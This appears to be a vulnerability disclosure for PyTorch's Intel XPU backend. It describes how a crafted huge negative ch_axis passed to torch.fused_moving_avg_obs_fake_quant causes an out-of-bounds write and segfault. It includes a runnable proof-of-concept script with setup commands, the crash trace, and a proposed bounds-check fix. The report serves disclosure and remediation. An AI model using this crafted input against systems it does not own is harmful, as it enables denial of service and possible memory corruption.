The Intel XPU implementation of fused_moving_avg_obs_fake_quant_xpu validates only the upper bound of ch_axis:
TORCH_CHECK(
    ch_axis < x.dim(),
    "Error in fused_moving_avg_obs_fq_helper: ch_axis must be < "
    "self.dim()");
However, in the per_row_fq path, the same value is later used as an index into a native DimVector:
auto res = DimVector(x.sizes());
std::iota(res.begin(), res.end(), 0);
res[ch_axis] = 0;
res[0] = ch_axis;
y = x.permute(res);
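The intended effect of these lines can be modeled in Python. This is a sketch with a hypothetical helper name, per_row_permutation, not the XPU code itself. For an in-range ch_axis the code swaps axis 0 with ch_axis, so the channel axis becomes the leading dimension before permute. The explicit range check in the sketch is the precondition the C++ code assumes but never enforces. It is written out because Python lists would otherwise silently wrap negative indices, whereas DimVector's operator[] does not bounds-check the index in optimized builds.

```python
def per_row_permutation(ndim: int, ch_axis: int) -> list[int]:
    """Hypothetical Python model of the per_row_fq permutation in the XPU kernel."""
    # Make the implicit C++ precondition explicit instead of relying on
    # Python's own negative-index wrapping, which C++ does not have.
    if not 0 <= ch_axis < ndim:
        raise IndexError(f"ch_axis {ch_axis} out of range for {ndim} dims")
    res = list(range(ndim))  # std::iota(res.begin(), res.end(), 0)
    res[ch_axis] = 0         # res[ch_axis] = 0
    res[0] = ch_axis         # res[0] = ch_axis
    return res


print(per_row_permutation(4, 2))  # [2, 1, 0, 3]
```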
There is no lower-bound validation such as ch_axis >= 0, nor canonicalization through a dimension-wrapping helper such as maybe_wrap_dim.
A large negative ch_axis therefore passes the explicit check (ch_axis < x.dim()) and reaches native C++ code in the XPU backend, where res[ch_axis] = 0 writes far outside the DimVector's storage. In testing, this causes a deterministic segmentation fault in libtorch_xpu.so.
This is reachable from public Python APIs in the Intel XPU PyTorch wheel.
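The arithmetic behind the crash can be sketched in Python. The sketch assumes that DimVector stores int64_t entries (8 bytes each) and that the index is applied as a 64-bit offset. Under those assumptions, res[ch_axis] addresses ch_axis * 8 bytes relative to res.begin(). The helper names below are hypothetical. The model shows that the PoC value (-1250999896764 on a 1-D tensor) is accepted by the upper-bound-only check, and that the write target lies about 9.1 TiB before the vector's storage.

```python
# Assumption: DimVector elements are int64_t, i.e. 8 bytes each.
DIMVECTOR_ELEM_BYTES = 8


def upper_bound_only_check(ch_axis: int, ndim: int) -> bool:
    """Hypothetical model of TORCH_CHECK(ch_axis < x.dim(), ...)."""
    return ch_axis < ndim


def write_offset_bytes(ch_axis: int) -> int:
    """Byte offset of res[ch_axis] relative to res.begin() (assumed 64-bit indexing)."""
    return ch_axis * DIMVECTOR_ELEM_BYTES


ndim = 1                 # x = torch.full((1,), ...) in the PoC
ch_axis = -1250999896764
print(upper_bound_only_check(ch_axis, ndim))  # True: the check accepts it
print(write_offset_bytes(ch_axis))            # -10007999174112
```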
Proof of Concept
The following commands create a clean virtual environment, install the Intel XPU PyTorch wheel, write the PoC from the terminal, and run it.
set -euo pipefail
mkdir -p ~/intel-xpu-research
python3 -m venv ~/venvs/torch-xpu-wheel
source ~/venvs/torch-xpu-wheel/bin/activate
python -m pip install --upgrade pip setuptools wheel
# Install PyTorch / torchvision / torchaudio XPU wheels.
pip install torch torchvision torchaudio --index-url https://download.pytorch.org/whl/xpu
# Optional sanity check: verify that the Intel XPU backend is visible.
python - <<'PY'
import torch
print("torch:", torch.__version__)
print("xpu available:", torch.xpu.is_available())
if torch.xpu.is_available():
    print("xpu device:", torch.xpu.get_device_name(0))
PY
# Write the PoC from the terminal.
cat > ~/intel-xpu-research/poc_fused_obs_xpu_huge_negative.py <<'PY'
import os
import torch
print("torch:", torch.__version__, flush=True)
print("torch file:", torch.__file__, flush=True)
print("xpu available:", torch.xpu.is_available(), flush=True)
print("xpu device:", torch.xpu.get_device_name(0), flush=True)
print("LD_LIBRARY_PATH:", os.environ.get("LD_LIBRARY_PATH", ""), flush=True)
device = "xpu"
x = torch.full((1,), 0.5, device=device, dtype=torch.float64)
observer_on = torch.full((1,), 1, device=device, dtype=torch.int32)
fake_quant_on = torch.full((1,), 1, device=device, dtype=torch.int64)
running_min = torch.full((1,), 0.5, device=device, dtype=torch.float64)
running_max = torch.full((1,), 0.5, device=device, dtype=torch.float64)
scale = torch.full((1,), 0.5, device=device, dtype=torch.float64)
zero_point = torch.full((1,), 0.5, device=device, dtype=torch.float64)
print("calling public torch.fused_moving_avg_obs_fake_quant", flush=True)
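out = torch.fused_moving_avg_obs_fake_quant(
    x,
    observer_on,
    fake_quant_on,
    running_min,
    running_max,
    scale,
    zero_point,
    0.0,             # averaging_const
    0,               # quant_min
    0,               # quant_max
    -1250999896764,  # ch_axis: huge negative value, passes ch_axis < x.dim()
    True,            # per_row_fake_quant: selects the per_row_fq path
    True,            # symmetric_quant
)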
torch.xpu.synchronize()
print("returned:", out, flush=True)
PY
# Run the PoC with a clean dynamic-library environment.
env -u LD_LIBRARY_PATH -u LD_PRELOAD -u SYCL_PI_TRACE \
PYTHONFAULTHANDLER=1 \
TORCH_SHOW_CPP_STACKTRACES=1 \
TORCH_DISABLE_ADDR2LINE=1 \
MALLOC_CHECK_=3 \
MALLOC_PERTURB_=165 \
ONEAPI_DEVICE_SELECTOR=level_zero:gpu \
python ~/intel-xpu-research/poc_fused_obs_xpu_huge_negative.py || rc=$?
# Under set -e, "|| rc=$?" keeps the expected crash from aborting the script.
echo "exit code: ${rc:-0}"
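The process crashes with a segmentation fault (the Python frames in this trace name poc_fused_obs_fake_quant_xpu_fuzz_axes.py rather than the script written above):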
torch: 2.9.1+xpu
xpu available: True
xpu device: Intel(R) Graphics [0x7d67]
LD_LIBRARY_PATH:
Fatal Python error: Segmentation fault
Current thread ... [python] (most recent call first):
File ".../poc_fused_obs_fake_quant_xpu_fuzz_axes.py", line 19 in run_case
File ".../poc_fused_obs_fake_quant_xpu_fuzz_axes.py", line 103 in <module>
Current thread's C stack trace:
...
Binary file ".../torch/lib/libtorch_xpu.so", at +0x616d2df
Binary file ".../torch/lib/libtorch_xpu.so", at +0x62043f7
Binary file ".../torch/lib/libtorch_xpu.so", at +0x6204491
Binary file ".../torch/lib/libtorch_cpu.so", at at::_ops::_fused_moving_avg_obs_fq_helper::redispatch(...)
Binary file ".../torch/lib/libtorch_cpu.so", at at::_ops::_fused_moving_avg_obs_fq_helper::call(...)
...
Segmentation fault
exit code: 139
The same crash was also reproduced through the helper-path operator with:
torch._fused_moving_avg_obs_fq_helper(..., ch_axis=-1250999896764, per_row_fake_quant=True, symmetric_quant=False)
and through the public operator with:
torch.fused_moving_avg_obs_fake_quant(..., ch_axis=-1250999896764, per_row_fake_quant=True, symmetric_quant=True)
Both crashed with exit code 139 and stack frames in libtorch_xpu.so.
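Exit code 139 is how a POSIX shell reports a process killed by signal 11 (128 + 11), i.e. SIGSEGV. The small helper below, describe_shell_exit, is a hypothetical name used only for illustration. It decodes such a status with Python's standard signal module.

```python
import signal


def describe_shell_exit(code: int) -> str:
    """Decode a POSIX shell exit status such as the "exit code: 139" above."""
    # Shells report a child killed by signal N as exit status 128 + N.
    if code > 128:
        return signal.Signals(code - 128).name
    return f"exited with status {code}"


print(describe_shell_exit(139))  # SIGSEGV (128 + 11)
```

Python's subprocess module reports the same condition differently: a child killed by SIGSEGV has a negative returncode (-11) rather than 139.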
Impact
A caller who can execute PyTorch code in a process using the Intel XPU backend can crash the process by passing a crafted negative ch_axis to the public fake-quantization operator.
Summary:
Native segmentation fault in libtorch_xpu.so
Process termination / denial of service
Potential memory corruption, since res[ch_axis] = 0 is an unchecked out-of-bounds write whenever ch_axis is negative
Affects public Python API usage, not only internal C++ calls
Recommended solution
Add explicit lower-bound validation or canonicalization for ch_axis before it is used.
For example:
TORCH_CHECK(
    ch_axis >= 0 && ch_axis < x.dim(),
    "Error in fused_moving_avg_obs_fq_helper: ch_axis must be >= 0 and < self.dim()");
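The canonicalization alternative can be sketched as follows. This is a hypothetical Python model named wrap_ch_axis, not the actual maybe_wrap_dim helper. It assumes the usual PyTorch convention that valid dimensions lie in [-ndim, ndim - 1], with negative values counted from the end. It does not model the special handling of 0-d tensors.

```python
def wrap_ch_axis(ch_axis: int, ndim: int) -> int:
    """Hypothetical Python model of maybe_wrap_dim-style canonicalization.

    Accepts ch_axis in [-ndim, ndim - 1] and returns the equivalent
    non-negative axis; anything else is rejected before it can be used
    as an index. 0-d tensors are not modeled here.
    """
    if ndim < 1:
        raise ValueError("sketch assumes at least one dimension")
    if not -ndim <= ch_axis < ndim:
        raise IndexError(
            f"ch_axis out of range (expected [{-ndim}, {ndim - 1}], got {ch_axis})"
        )
    return ch_axis + ndim if ch_axis < 0 else ch_axis


print(wrap_ch_axis(-1, 4))  # 3
```

Both approaches close the out-of-bounds write. Wrapping additionally accepts -1 as "last axis", consistent with other dimension arguments in PyTorch, while the strict check above rejects all negative values. Which behavior the XPU operator should expose is a maintainer decision.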